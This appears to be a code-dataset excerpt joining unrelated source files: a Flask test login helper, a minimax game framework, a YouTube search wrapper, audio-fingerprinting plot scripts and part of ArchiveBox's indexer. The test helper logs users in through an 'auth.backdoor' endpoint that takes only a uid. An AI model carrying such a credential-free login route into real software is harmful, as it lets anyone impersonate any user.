def login_as_gdl(client, db_session):
dn = f"test{uuid.uuid4()}"
nom = f"nom{uuid.uuid4()}"
labo = OrgUnit(type=LABORATOIRE, dn=dn, nom=nom)
p = Profile(
uid="courtoisi",
nom="Courtois",
prenom="Isabelle",
email="<EMAIL>",
laboratoire=labo,
)
db_session.add(p)
db_session.flush()
id = p.id
p1 = Profile.query.get(id)
assert p1 is p
login_as(p, client)
def login_as(profile: Profile, client):
uid = profile.uid
r = client.get(url_for("auth.backdoor", uid=uid))
assert r.status_code == 201
r = client.get(url_for("v3.self"))
assert r.status_code == 200
assert r.json["data"]["uid"] == uid
```
|
{
"source": "jean3108/TwoPlayer-Game",
"score": 4
}
|
#### File: TwoPlayer-Game/twoPlayerAiGame/stateGame.py
```python
from abc import ABC, abstractmethod
from twoPlayerAiGame.aiAlgorithms import minmaxDecision, negamaxDecision, randomDecision, humanDecision
class StateGame(ABC):
"""
    Class which represents a state of a two-player game
"""
@abstractmethod
def __init__(self, maxPlayer):
"""
Create a state of the game.
:return: The state with the choosen information
:rtype: stateGame
"""
        self.maxPlayer = 1 if maxPlayer else -1
@abstractmethod
def calculateScore(self):
"""
Calculate the score of the current state if it's a terminal state or estimate the score
:return: The score of the current state
:rtype: number
"""
pass
@abstractmethod
def getChoices(self):
"""
Get the different choice for the player for the current state.
:return: Every choices that the player can make.
:rtype: list[object]
"""
pass
@abstractmethod
    def doChoice(self, choice, inNewState=False):
        """
        Apply the given choice to the current state (in place or not)
        :param choice: The choice to apply to the current state
        :param inNewState: To choose if the choice is applied in place (on the current state) or not (on a copy of the current state)
        :type inNewState: boolean
        :return: Nothing if it's in place, otherwise the new state.
        :rtype: stateGame or None
        """
pass
@abstractmethod
    def undoChoice(self, choice, inNewState=False):
        """
        Undo the given choice for the current state (in place or not)
        :param choice: The choice to undo
        :param inNewState: To choose if the choice is undone in place (on the current state) or not (on a copy of the current state)
        :type inNewState: boolean
        :return: Nothing if it's in place, otherwise the new state.
        :rtype: stateGame or None
        """
pass
@abstractmethod
def toKey(self):
"""
Get the unique ID of the state.
This ID is useful to use memoization in different algorithms
:return: the ID of the current state
:rtype: string
"""
pass
@abstractmethod
def printBeforeGame(self):
"""
Print information before the beginning of the game
"""
pass
@abstractmethod
def printInfoPlayer(self):
"""
Print information before the turn of the current player
"""
pass
@abstractmethod
def printResultAction(self, choice):
"""
Print information after the turn of the current player
        :param choice: The choice which was just played
:type choice: typeof(self.getChoices()[0])
"""
pass
@abstractmethod
def printAfterGame(self):
"""
Print information after the end of the game
"""
pass
def play(self, player1, player2, verbose=True):
"""
Play the game
:param player1: String to choose the algorithm for the choice of the player1 (can be human)
:param player2: String to choose the algorithm for the choice of the player2 (can be human)
:param verbose: Indicate if information are printed or not
:type player1: String
:type player2: String
:type verbose: boolean
        :return: the number of the winner, otherwise 0
:rtype: int
"""
####################################
# Selection of algorithm & Setting #
####################################
if(player1=='human'):
function1 = humanDecision
elif(player1=='minmax'):
function1 = minmaxDecision
elif(player1=='negamax'):
function1 = negamaxDecision
elif(player1=='random'):
function1 = randomDecision
if(player2=='human'):
function2 = humanDecision
elif(player2=='minmax'):
function2 = minmaxDecision
elif(player2=='negamax'):
function2 = negamaxDecision
elif(player2=='random'):
function2 = randomDecision
#########################
# Beginning of the game #
#########################
over = False
if(verbose==True):
self.printBeforeGame()
currentScore = self.calculateScore()
while(currentScore==False):
if(verbose==True):
self.printInfoPlayer()
if(self.maxPlayer==1):
choice = function1(self)[1]
else:
choice = function2(self)[1]
self.doChoice(choice)
currentScore = self.calculateScore()
if(verbose==True):
self.printResultAction(choice)
if(verbose==True):
self.printAfterGame()
return currentScore
```
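As a sketch of how the abstract interface is meant to be implemented, here is a hypothetical one-pile Nim game (each player removes 1 or 2 sticks, taking the last stick wins); it is illustrative only and not part of the package:
```python
from twoPlayerAiGame.stateGame import StateGame

class NimState(StateGame):
    def __init__(self, maxPlayer=True, sticks=7):
        super().__init__(maxPlayer)
        self.sticks = sticks
    def calculateScore(self):
        # The player who just moved took the last stick and won.
        return -self.maxPlayer if self.sticks == 0 else False
    def getChoices(self):
        return [n for n in (1, 2) if n <= self.sticks]
    def doChoice(self, choice, inNewState=False):
        self.sticks -= choice
        self.maxPlayer = -self.maxPlayer
    def undoChoice(self, choice, inNewState=False):
        self.sticks += choice
        self.maxPlayer = -self.maxPlayer
    def toKey(self):
        return f"{self.sticks}:{self.maxPlayer}"
    def printBeforeGame(self):
        print(f"Nim: {self.sticks} sticks, take 1 or 2, last stick wins")
    def printInfoPlayer(self):
        print(f"{self.sticks} sticks left")
    def printResultAction(self, choice):
        print(f"-> removed {choice} stick(s)")
    def printAfterGame(self):
        print("Game over")

# NimState(True).play("random", "random", verbose=False)  # returns 1 or -1
```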
|
{
"source": "Jean-6/python",
"score": 3
}
|
#### File: Jean-6/python/tp2-table.py
```python
import random
import time
table=[1,2,3,4,5,2,1,11,32,20]
var = 1;
def to_calculate_average(table):
total=0;
moy=0;
for item in table:
total=total+item;
moy=total/len(table);
return moy;
def occurrence_number(table,elt):
count=0;
for item in table:
if elt==item :
count=count+1;
return count;
def number_of_elements_up_or_equals_to_ten(table):
count =0;
for item in table:
if item >=10:
count=count+1;
return count;
def research_max_value(table):
max=table[0];
for item in table :
if max<item:
max=item;
return max;
def test_element_existing(table,elt):
check=False;
for item in table:
if elt==item:
check=True;
return check;
def to_generate_table(n):
newTable=[];
count=0;
while count<n :
newTable.append(random.randint(0,10));
count=count+1;
random.shuffle(newTable);
return newTable;
print("Average :",to_calculate_average(table));
print("Occurrence number of {} in table : {}".format(var,occurrence_number(table,var)));
print("Number of elements up or equals to ten : {}".format(number_of_elements_up_or_equals_to_ten(table)));
print("Max value is : {}".format(research_max_value(table)));
print("{} exists in table : {} ".format(var,test_element_existing(table,var)));
t1=time.process_time();
print("Table generated : {}".format( to_generate_table(100)));
t2=time.process_time();
print("Executing time : {}".format(t2-t1),"sec.");
```
|
{
"source": "jean9208/pychromeless",
"score": 3
}
|
#### File: pychromeless/src/lambda_function.py
```python
from autocompara_lambda import cotizar
def lambda_handler(*args, **kwargs):
#tipo = args[0]
#year = args[1]
#version = args[2]
#cp = args[3]
tipo = 'AUTO'
year = '2021'
version = 'YARIS S HB CVT 1.5L 4CIL'
cp = '55717'
output = cotizar(tipo, year, version, cp)
return(output)
```
|
{
"source": "Jean-Abou-Samra/sphinx-lint",
"score": 2
}
|
#### File: sphinx-lint/tests/test_sphinxlint.py
```python
from pathlib import Path
import pytest
from sphinxlint import main
FIXTURE_DIR = Path(__file__).resolve().parent / "fixtures"
@pytest.mark.parametrize("file", [str(f) for f in (FIXTURE_DIR / "xpass").glob("*.*")])
def test_sphinxlint_shall_pass(file, capsys):
try:
main(["sphinxlint.py", str(file)])
except SystemExit as err:
error_count = err.code
out, err = capsys.readouterr()
assert out == "No problems found.\n"
assert err == ""
assert error_count == 0
@pytest.mark.parametrize("file", [str(f) for f in (FIXTURE_DIR / "xfail").glob("*.*")])
def test_sphinxlint_shall_not_pass(file, capsys):
try:
main(["sphinxlint.py", str(file)])
except SystemExit as err:
error_count = err.code
out, err = capsys.readouterr()
assert out != "No problems found.\n"
assert err == ""
assert error_count > 0
```
|
{
"source": "JeanAEckelberg/Doc",
"score": 3
}
|
#### File: Doc/server/youtube_utils.py
```python
from apiclient.discovery import build
from apiclient.errors import HttpError
from oauth2client.tools import argparser
import json
DEVELOPER_KEY = "<KEY>"
YOUTUBE_API_SERVICE_NAME = "youtube"
YOUTUBE_API_VERSION = "v3"
def search(query):
youtube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
developerKey=DEVELOPER_KEY)
videos = []
channels = []
playlists = []
saved_video = False;
# Get related json file
try:
with open(query[0].upper()+'.json', 'r') as read_file:
data = json.load(read_file)
# Check query against data
for item in data:
if query.upper() == item['query']:
saved_video = True;
item['query'] = ""
videos.append(item)
    except (FileNotFoundError, json.JSONDecodeError):
        pass
# Check to see if the query passed is a direct link
if 'https://www.youtube.com/watch?v=' in query:
#Get unique video id from link
video_id = query.split('=')[1]
videos.append({
"query": "",
"title": "Direct Url Request",
"id": video_id,
"uploader": "Direct Url Request",
"description": "Direct Url Request",
"thumbnail": "https://static.wikia.nocookie.net/pokemon/images/d/d6/Jessie_Mimikyu.png/revision/latest?cb=20170915045921",
"url": query,
"autoplay_url": query + "?autoplay=1"
})
elif saved_video == True:
pass
else:
search_response = youtube.search().list(
q=query,
part="id,snippet",
maxResults=50
).execute()
# Add each result to the appropriate list, and then display the lists of
# matching videos, channels, and playlists.
for search_result in search_response.get("items", []):
if search_result["id"]["kind"] == "youtube#video":
videos.append({
"query": query.upper(),
"title": search_result["snippet"]["title"],
"id": search_result["id"]["videoId"],
"uploader": search_result["snippet"]["channelTitle"],
"description": search_result["snippet"]["description"],
"thumbnail": search_result["snippet"]["thumbnails"]["high"],
"url": "https://www.youtube.com/embed/" + search_result["id"]["videoId"],
"autoplay_url": "https://www.youtube.com/embed/" + search_result["id"]["videoId"] + "?autoplay=1"
})
return videos
def search_related_videos(video_id):
youtube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
developerKey=DEVELOPER_KEY)
search_response = youtube.search().list(
part="id,snippet",
relatedToVideoId=video_id,
maxResults=50,
type="video"
).execute()
videos = []
channels = []
playlists = []
# Add each result to the appropriate list, and then display the lists of
# matching videos, channels, and playlists.
for search_result in search_response.get("items", []):
if search_result["id"]["kind"] == "youtube#video":
videos.append({
"title": search_result["snippet"]["title"],
"id": search_result["id"]["videoId"],
"uploader": search_result["snippet"]["channelTitle"],
"description": search_result["snippet"]["description"],
"thumbnail": search_result["snippet"]["thumbnails"]["high"],
"url": "https://www.youtube.com/embed/" + search_result["id"]["videoId"],
"autoplay_url": "https://www.youtube.com/embed/" + search_result["id"]["videoId"] + "?autoplay=1"
})
return videos
def get_video(yt_id, query):
youtube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
developerKey=DEVELOPER_KEY)
response = youtube.videos().list(
part="id,snippet,contentDetails",
id=yt_id
).execute()
#print(response)
response = response.get("items", [None])[0]
if not response:
return None
video = {
"query": query.upper(),
"title": response["snippet"]["title"],
"id": response["id"],
"uploader": response["snippet"]["channelTitle"],
"description": response["snippet"]["description"],
"thumbnail": response["snippet"]["thumbnails"]["high"],
"url": "https://www.youtube.com/embed/" + response["id"],
"autoplay_url": "https://www.youtube.com/embed/" + response["id"] + "?autoplay=1",
"duration": response["contentDetails"]["duration"]
}
    # Cache the video under the query's first letter, in the list format
    # that search() reads back.
    if video['query'] != "":
        filename = query[0].upper() + '.json'
        try:
            with open(filename) as data_file:
                data = json.load(data_file)
        except (FileNotFoundError, json.JSONDecodeError):
            data = []
        data.append(video)
        with open(filename, 'w') as data_file:
            json.dump(data, data_file)
return video
```
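Both helpers call the YouTube Data API v3 with the module-level DEVELOPER_KEY, so a valid key is assumed; a hedged usage sketch:
```python
videos = search("lofi hip hop")  # cached entries or fresh API results
if videos:
    related = search_related_videos(videos[0]["id"])
    details = get_video(videos[0]["id"], "lofi hip hop")
```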
|
{
"source": "jean-andre-gauthier/findsong",
"score": 3
}
|
#### File: scripts/plots/create_audio_filter_plots.py
```python
from argparse import ArgumentParser
import matplotlib
matplotlib.use("Agg")
from itertools import groupby
import matplotlib.pyplot as plt
import numpy as np
from os import path
def main():
parser = ArgumentParser()
parser.add_argument(
"--audiofilterplotpath",
help="path to the audio filter output plot (path)",
required=True,
type=str)
parser.add_argument(
"--pitchplotpath",
help="path to the pitch output plot (path)",
required=True,
type=str)
parser.add_argument(
"--tempoplotpath",
help="path to the tempo output plot (path)",
required=True,
type=str)
args = parser.parse_args()
if path.exists(args.audiofilterplotpath):
print(f"Error: {args.audiofilterplotpath} already exists")
exit(1)
if path.exists(args.pitchplotpath):
print(f"Error: {args.pitchplotpath} already exists")
exit(1)
if path.exists(args.tempoplotpath):
print(f"Error: {args.tempoplotpath} already exists")
exit(1)
create_audio_filter_plot(args.audiofilterplotpath)
create_pitch_plot(args.pitchplotpath)
create_tempo_plot(args.tempoplotpath)
def create_audio_filter_plot(audio_filter_plot_path):
plt.figure(0, figsize=(5, 7.5))
axes = [plt.subplot2grid((2, 1), (0, 0)), plt.subplot2grid((2, 1), (1, 0))]
    plt.suptitle(
        "Matcher performance with distorted audio", fontsize=12, y=0.05)
plt.tight_layout(pad=4.0, w_pad=4.0, h_pad=4.0)
indices = np.arange(1, 8)
labels = np.array([
"aecho", "aphaser", "chorus", "clean", "flanger", "highpass", "lowpass"
])
values = np.array([97.55, 97.91, 98.05, 99.36, 97.81, 97.88, 99.21])
aecho, aphaser, chorus, clean, flanger, highpass, lowpass = axes[0].bar(
indices, values)
axes[0].set_xticks(indices)
axes[0].set_xticklabels(labels, rotation=45)
axes[0].set_ylim([95, 100])
axes[0].set_ylabel("Recognition rate in %")
cell_text = np.array([["aecho", "0.8:0.8:1000:0.8"], [
"aphaser", "delay=5.0:speed=2.0"
], ["chorus", "0.7:0.9:55:0.4:0.25:2"], ["clean", "-"],
["flanger", "delay=20:depth=5:regen=10:speed=2"],
["highpass", "f=440"], ["lowpass", "f=440"]])
col_labels = np.array(["filter name", "filter parameter"])
axes[1].xaxis.set_visible(False)
axes[1].yaxis.set_visible(False)
table = axes[1].table(
cellText=cell_text,
colLabels=col_labels,
alpha=0.0,
bbox=None,
colLoc="center",
cellLoc="center",
loc="center",
rasterized=False,
rowLoc="center")
table.auto_set_font_size(False)
table.set_fontsize(6)
table.scale(1, 1.75)
for (line, col), cell in table.get_celld().items():
if line == 0:
cell._text.set_weight("bold")
cell.set_linewidth(0)
cell.set_fill(False)
plt.savefig(audio_filter_plot_path, transparent=True)
def create_pitch_plot(pitch_plot_path):
xs = np.arange(1, 7)
ys1 = np.array([41, 12, 5, 2, 10, 1])
ys2 = np.array([38.29, 24.33, 20.4, 15, 16.3, 13])
create_plot(xs, "Pitch shift (halftones)", ys1, "Recognition rate in %",
ys2, "Average match score",
"Matcher performance with pitch shift", pitch_plot_path)
def create_tempo_plot(tempo_plot_path):
xs = np.array([2.5, 5, 7.5, 10, 12.5, 15])
ys1 = np.array([97, 95, 73, 54, 49, 36])
ys2 = np.array([76.26, 39.14, 26.93, 23.74, 21.24, 20.28])
create_plot(xs, "Tempo increase (percent)", ys1, "Recognition rate in %",
ys2, "Average match score",
"Matcher performance with tempo increase", tempo_plot_path)
def create_plot(xs, xs_label, ys1, ys_label1, ys2, ys_label2, title,
file_name):
figure, axis1 = plt.subplots()
axis1.set_xlabel(xs_label)
axis1.set_ylabel(ys_label1, color="red")
axis1.tick_params(axis='y', labelcolor="red")
handle1, = plt.plot(xs, ys1, "r--", label=ys_label1)
ticks = [tick for tick in plt.gca().get_yticks() if tick >= 0]
plt.gca().set_yticks(ticks)
axis2 = axis1.twinx()
axis2.set_ylabel(ys_label2, color="blue")
axis2.tick_params(axis='y', labelcolor="blue")
handle2, = plt.plot(xs, ys2, "b--", label=ys_label2)
figure.tight_layout(pad=3.0, w_pad=3.0, h_pad=3.0)
figure.suptitle(title, fontsize=12, y=0.05)
plt.legend(handles=[handle1, handle2], loc=1)
plt.savefig(file_name, transparent=True)
if __name__ == "__main__":
main()
```
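`create_plot` is the reusable piece here: one shared x-axis and two y-axes via `twinx()`. A hypothetical call outside `main` (the data is made up):
```python
import numpy as np

xs = np.arange(1, 6)
create_plot(xs, "Noise level", np.array([99, 97, 90, 80, 65]),
            "Recognition rate in %", np.array([80, 60, 45, 35, 30]),
            "Average match score", "Matcher performance with noise",
            "noise_plot.png")
```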
#### File: scripts/plots/create_dump_plots.py
```python
from argparse import ArgumentParser
from itertools import groupby, islice
from os import listdir
from os.path import isfile, join
import re
from matplotlib import collections as mc, colors, pyplot as plt, rc
import numpy as np
from scipy.io.wavfile import write
def main():
parser = ArgumentParser()
parser.add_argument(
"--signalwav",
action="store_true",
help="generate wav file for signal")
parser.add_argument(
"--signalplot", action="store_true", help="generate plots for signal")
parser.add_argument(
"--spectrogramplot",
action="store_true",
help="generate plots for spectrogram")
parser.add_argument(
"--constellationmapplot",
action="store_true",
help="generate plots for constellation map")
parser.add_argument(
"--peakpairsplot",
action="store_true",
help="generate plots for peak pairs")
parser.add_argument(
"--songoffsetsplot",
action="store_true",
help="generate plots for song offsets")
args = parser.parse_args()
rc("font", family="Arial")
folder = "."
max_time = 80
sample_rate = 8000
width, height = 90, 10
if args.signalwav:
n_output_samples = 80000
signal_pattern = (r"(signal-to-peak-pairs-signal.*|" +
r"signal-to-matches-signal-microphone)\.txt$")
signal_filenames = filenames(folder, signal_pattern)
write_signal_wav(signal_filenames, n_output_samples, sample_rate)
if args.signalplot:
n_shown_samples = 8000
signal_pattern = (r"(signal-to-peak-pairs-signal.*|" +
r"signal-to-matches-signal-microphone)\.txt$")
signal_filenames = filenames(folder, signal_pattern)
write_signal_plot(signal_filenames, n_shown_samples, sample_rate,
width, height)
if args.spectrogramplot:
spectrogram_pattern = (
r"(signal-to-peak-pairs-spectrogram.*|" +
r"signal-to-matches-spectrogram-microphone)\.txt$")
spectrogram_filenames = filenames(folder, spectrogram_pattern)
width, height = 10, 60
write_spectrogram_plot(spectrogram_filenames, max_time, width, height)
if args.constellationmapplot:
constellation_map_pattern = (
r"(signal-to-peak-pairs-constellation-map.*|" +
r"signal-to-matches-constellation-map-microphone)\.txt$")
constellation_map_filenames = filenames(folder,
constellation_map_pattern)
write_constellation_map_plot(constellation_map_filenames, max_time,
width, height)
if args.peakpairsplot:
peak_pairs_pattern = (
r"(signal-to-peak-pairs-peak-pairs.*|" +
r"signal-to-peak-pairs-peak-pairs-microphone)\.txt$")
peak_pairs_filenames = filenames(folder, peak_pairs_pattern)
write_peak_pairs_plot(peak_pairs_filenames, max_time, width, height)
if args.songoffsetsplot:
song_offsets_pattern = (
r"signal-to-matches-song-offsets-" + r"microphone.txt$")
song_offsets_filenames = filenames(folder, song_offsets_pattern)
write_song_offsets_plot(song_offsets_filenames, width, height)
def filenames(folder, pattern):
"""
Returns a list of filenames that correspond to the given pattern
"""
return [
f for f in listdir(folder)
if isfile(join(folder, f)) and re.match(pattern, f)
]
def write_signal_wav(input_filenames, n_output_samples, sample_rate):
"""
Converts sample files to wav files
"""
for signal_filename in input_filenames:
with open(signal_filename) as signal_file:
signal = list(map(int, islice(signal_file, n_output_samples)))
scaled_signal = np.int8(
signal / np.max(np.abs(signal)).astype(float) * 65535)
scaled_signal.byteswap(True)
write(signal_filename + ".wav", sample_rate, scaled_signal)
def write_signal_plot(input_filenames, n_shown_samples, sample_rate, width,
height):
"""
Visualises sample files with a signal plot
"""
for signal_filename in input_filenames:
with open(signal_filename) as signal_file:
signal = list(map(int, islice(signal_file, n_shown_samples)))
time = np.linspace(0, len(signal) / sample_rate, num=len(signal))
plt.figure(1, figsize=(width, height))
plt.title("Signal (sample rate 8000Hz)", fontsize=36)
plt.xlabel("Time (seconds)", fontsize=18)
plt.ylabel("Amplitude (8 bits unsigned)", fontsize=18)
plt.plot(time, signal, color="red")
plt.savefig(signal_filename + ".png")
def write_spectrogram_plot(spectrogram_filenames, max_time, width, height):
"""
Creates a heatmap for spectrogram files
"""
for spectrogram_filename in spectrogram_filenames:
spectrogram = np.loadtxt(spectrogram_filename)[
0:max_time, :].transpose()
normalize = colors.Normalize(0, max(map(max, spectrogram)))
plt.figure(1, figsize=(width, height))
plt.title("Spectrogram", fontsize=36)
plt.xlabel("Time (chunk index)", fontsize=18)
plt.ylabel("Frequency (range)", fontsize=18)
plt.imshow(
spectrogram,
aspect="auto",
cmap="Reds",
interpolation="nearest",
norm=normalize)
plt.savefig(spectrogram_filename + ".png")
def write_constellation_map_plot(constellation_map_filenames, max_time, width,
height):
"""
Creates a scatter plot for constellation map files
"""
for constellation_map_filename in constellation_map_filenames:
with open(constellation_map_filename) as constellation_map_file:
peaks = list(
filter(
lambda ft: ft[1] <= max_time,
map(lambda tf: [float(n) for n in reversed(tf.split(" "))],
islice(constellation_map_file, 1, None))))
plt.figure(1, figsize=(width, height))
plt.title("Constellation map", fontsize=36)
plt.xlabel("Time (chunk index)", fontsize=18)
plt.ylabel("Frequency (range)", fontsize=18)
x, y = zip(*peaks)
plt.scatter(x, y)
plt.savefig(constellation_map_filename + ".png")
def write_peak_pairs_plot(peak_pairs_filenames, max_time, width, height):
"""
Visualises peak pairs in a line plot
"""
for peak_pairs_filename in peak_pairs_filenames:
with open(peak_pairs_filename) as peak_pairs_file:
            def max_time_filter(f1t1f2t2):
                # no trailing comma here: returning a one-element tuple
                # would make the filter accept every pair
                return (f1t1f2t2[0][1] <= max_time
                        and f1t1f2t2[1][1] <= max_time)

            def frequency_time_mapper(f1t1f2t2):
                # cast to float so LineCollection receives numeric coordinates
                return [(float(f1t1f2t2[0]), float(f1t1f2t2[1])),
                        (float(f1t1f2t2[2]), float(f1t1f2t2[3]))]
peak_pairs = list(
filter(
max_time_filter,
map(frequency_time_mapper, [
l.split(" ") for l in islice(peak_pairs_file, 1, None)
])))
peak_pairs_lines = mc.LineCollection(peak_pairs)
fig, ax = plt.subplots()
fig.set_size_inches(width, height)
ax.add_collection(peak_pairs_lines)
ax.autoscale()
plt.title("Peak pairs", fontsize=36)
plt.xlabel("Time (chunk index)", fontsize=18)
plt.ylabel("Frequency (Hz)", fontsize=18)
plt.savefig(peak_pairs_filename + ".png")
def write_song_offsets_plot(song_offsets_filenames, width, height):
"""
Creates histograms for song offset files
"""
for song_offsets_filename in song_offsets_filenames:
with open(song_offsets_filename) as song_offsets_file:
songname_offsets = groupby(
[l.rsplit(" ", 1) for l in islice(song_offsets_file, 1, None)],
lambda songnameOffset: songnameOffset[0])
plt.figure(1, figsize=(width, height))
plt.title("Song offsets histogram", fontsize=36)
songname_offsets_dict = {}
for songname, offsets in songname_offsets:
songname_offsets_dict[songname] = list(
map(lambda songnameOffset: int(songnameOffset[1]),
list(offsets)))
subplot_index = 1
for songname, offsets in songname_offsets_dict.items():
plt.subplot(1, len(songname_offsets_dict), subplot_index)
offsets_list = [int(o) for o in list(offsets)]
plt.hist(offsets_list, max(offsets_list))
plt.title(songname)
plt.xlabel("Offset (chunk index)", fontsize=18)
plt.ylabel("# occurrences", fontsize=18)
subplot_index += 1
plt.savefig(song_offsets_filename + ".png")
if __name__ == '__main__':
main()
```
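The `filenames` helper above pairs `re.match` with `os.listdir`, so every pattern is anchored at the start of the file name. A minimal sketch of how the signal pattern filters a directory listing (the listing itself is invented for illustration):
```python
import re

# Hypothetical directory contents, invented for illustration.
names = [
    "signal-to-peak-pairs-signal-01.txt",
    "signal-to-matches-signal-microphone.txt",
    "unrelated-notes.txt",
]
pattern = (r"(signal-to-peak-pairs-signal.*|"
           r"signal-to-matches-signal-microphone)\.txt$")

# re.match anchors at the beginning of the name, so only the first
# two entries survive the filter.
print([n for n in names if re.match(pattern, n)])
```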
#### File: scripts/plots/create_performance_plot.py
```python
from argparse import ArgumentParser
from os import path
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import numpy as np
def main():
parser = ArgumentParser()
parser.add_argument(
"--inputfilepath",
help="path to the input file (path)",
required=True,
type=str)
parser.add_argument(
"--outputplotindexerpath",
help="path to the indexer output plot (path)",
required=True,
type=str)
parser.add_argument(
"--outputplotmatchespath",
help="path to the matches output plot (path)",
required=True,
type=str)
args = parser.parse_args()
if not path.exists(args.inputfilepath):
print(f"Error: {args.inputfilepath} does not exist")
exit(1)
if path.exists(args.outputplotindexerpath):
print(f"Error: {args.outputplotindexerpath} already exists")
exit(1)
if path.exists(args.outputplotmatchespath):
print(f"Error: {args.outputplotmatchespath} already exists")
exit(1)
with open(args.inputfilepath) as input_file:
input_file_contents = list(
map(lambda line: line.strip().split(" "), input_file.readlines()))
        plt_index_sizes = list(
            map(lambda line: int(line[0]), input_file_contents))
        plt_index_fingerprints = list(
            map(lambda line: int(line[1]), input_file_contents))
        plt_indexer_durations = list(
            map(lambda line: int(line[2]), input_file_contents))
        plt_matcher_durations_averages = list(
            map(lambda line: np.average(np.array(line[3:]).astype(int)),
                input_file_contents))
make_plot(plt_index_sizes, "Index size (# songs)",
plt_index_fingerprints, "# Fingerprints",
plt_indexer_durations, "Indexer duration (ms)",
"Indexer Performance", args.outputplotindexerpath)
make_plot(plt_index_sizes, "Index size (# songs)",
plt_index_fingerprints, "# Fingerprints",
plt_matcher_durations_averages,
"Matcher average duration (ms)", "Matcher Performance",
args.outputplotmatchespath)
def align_yaxis(ax1, v1, ax2, v2):
_, y1 = ax1.transData.transform((0, v1))
_, y2 = ax2.transData.transform((0, v2))
adjust_yaxis(ax2, (y1 - y2) / 2, v2)
adjust_yaxis(ax1, (y2 - y1) / 2, v1)
def adjust_yaxis(ax, ydif, v):
inv = ax.transData.inverted()
_, dy = inv.transform((0, 0)) - inv.transform((0, ydif))
miny, maxy = ax.get_ylim()
miny, maxy = miny - v, maxy - v
if -miny > maxy or (-miny == maxy and dy > 0):
nminy = miny
nmaxy = miny * (maxy + dy) / (miny + dy)
else:
nmaxy = maxy
nminy = maxy * (miny + dy) / (maxy + dy)
ax.set_ylim(nminy + v, nmaxy + v)
def make_plot(xs, xs_label, ys1, ys_label1, ys2, ys_label2, title, file_name):
figure, axis1 = plt.subplots()
axis1.set_xlabel(xs_label)
axis1.set_ylabel(ys_label1, color="red")
axis1.tick_params(axis='y', labelcolor="red")
handle1, = plt.plot(xs, ys1, "r--", label=ys_label1)
ticks = [tick for tick in plt.gca().get_yticks() if tick >= 0]
plt.gca().set_yticks(ticks)
axis2 = axis1.twinx()
axis2.set_ylabel(ys_label2, color="blue")
axis2.tick_params(axis='y', labelcolor="blue")
handle2, = plt.plot(xs, ys2, "b--", label=ys_label2)
align_yaxis(axis1, 2700, axis2, 5000)
figure.tight_layout(pad=3.0, w_pad=3.0, h_pad=3.0)
figure.suptitle(title, fontsize=12, y=0.05)
plt.legend(handles=[handle1, handle2], loc=1)
plt.savefig(file_name, transparent=True)
if __name__ == "__main__":
main()
```
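`align_yaxis` above shifts the limits of one twinned axis so a chosen value on each axis lands at the same height. A standalone sketch of the underlying idea, with synthetic data and arbitrarily chosen reference values:
```python
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt

fig, ax1 = plt.subplots()
ax1.plot([1, 2, 3], [100, 200, 300], "r--")
ax2 = ax1.twinx()
ax2.plot([1, 2, 3], [5, 10, 15], "b--")

# Manual equivalent of the align_yaxis idea: pick limits so that the
# reference values (200 on the left, 10 on the right) sit at the same
# fraction of the axis height.
ax1.set_ylim(0, 400)  # 200 sits halfway up the left axis
ax2.set_ylim(0, 20)   # 10 sits halfway up the right axis
fig.savefig("twin_axes_sketch.png")
```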
#### File: scripts/plots/create_recognition_rate_plot.py
```python
from argparse import ArgumentParser
from os import path
import matplotlib
matplotlib.use("Agg")
from itertools import groupby
import matplotlib.pyplot as plt
def main():
parser = ArgumentParser()
parser.add_argument(
"--inputfilepath",
help="path to the input file (path)",
required=True,
type=str)
parser.add_argument(
"--outputplotpath",
help="path to the output plot (path)",
required=True,
type=str)
args = parser.parse_args()
if not path.exists(args.inputfilepath):
print(f"Error: {args.inputfilepath} does not exist")
exit(1)
if path.exists(args.outputplotpath):
print(f"Error: {args.outputplotpath} already exists")
exit(1)
with open(args.inputfilepath) as input_file:
figure, axis = plt.subplots()
figure.suptitle("Matcher recognition rate", fontsize=12, y=0.05)
figure.tight_layout(pad=4.0, w_pad=4.0, h_pad=4.0)
axis.set_xlabel("Relative noise level")
axis.set_ylabel("Recognition rate in %")
input_file_contents = list(
map(lambda line: line.strip().split(" "), input_file.readlines()))
legends = []
xs = sorted(set(map(lambda line: int(line[1]), input_file_contents)))
yss = groupby(input_file_contents, key=lambda line: line[0])
for (clip_length, ys) in yss:
legends.append("Clip Length = " + str(clip_length))
            ysi = list(
                map(
                    lambda length_recrate: float(length_recrate[2]),
                    sorted(
                        ys,
                        key=lambda length_recrate: int(length_recrate[1]),
                    )))
plt.plot(xs, ysi)
plt.legend(legends, loc="best", fancybox=True, framealpha=0)
plt.savefig(args.outputplotpath, transparent=True)
if __name__ == "__main__":
main()
```
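One thing to keep in mind when reading the loop above: `itertools.groupby` only merges consecutive runs, so the input file is implicitly assumed to be sorted by clip length. A small illustration with invented rows:
```python
from itertools import groupby

rows = [["5", "0", "90"], ["10", "0", "80"], ["5", "10", "85"]]

# Unsorted input: clip length "5" shows up as two separate groups.
print([k for k, _ in groupby(rows, key=lambda r: r[0])])  # ['5', '10', '5']

# Sorting by the key first gives one group per clip length.
rows.sort(key=lambda r: r[0])
print([k for k, _ in groupby(rows, key=lambda r: r[0])])  # ['10', '5']
```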
|
{
"source": "jean/ArchiveBox",
"score": 2
}
|
#### File: ArchiveBox/archivebox/index.py
```python
import os
import json
from datetime import datetime
from string import Template
try:
from distutils.dir_util import copy_tree
except ImportError:
print('[X] Missing "distutils" python package. To install it, run:')
print(' pip install distutils')
from config import (
OUTPUT_DIR,
TEMPLATES_DIR,
GIT_SHA,
FOOTER_INFO,
)
from util import (
chmod_file,
urlencode,
derived_link_info,
check_link_structure,
check_links_structure,
wget_output_path,
latest_output,
)
from parse import parse_links
from links import validate_links
from logs import (
log_indexing_process_started,
log_indexing_started,
log_indexing_finished,
log_parsing_started,
log_parsing_finished,
)
TITLE_LOADING_MSG = 'Not yet archived...'
### Homepage index for all the links
def write_links_index(out_dir, links, finished=False):
"""create index.html file for a given list of links"""
log_indexing_process_started()
check_links_structure(links)
log_indexing_started(out_dir, 'index.json')
write_json_links_index(out_dir, links)
log_indexing_finished(out_dir, 'index.json')
log_indexing_started(out_dir, 'index.html')
write_html_links_index(out_dir, links, finished=finished)
log_indexing_finished(out_dir, 'index.html')
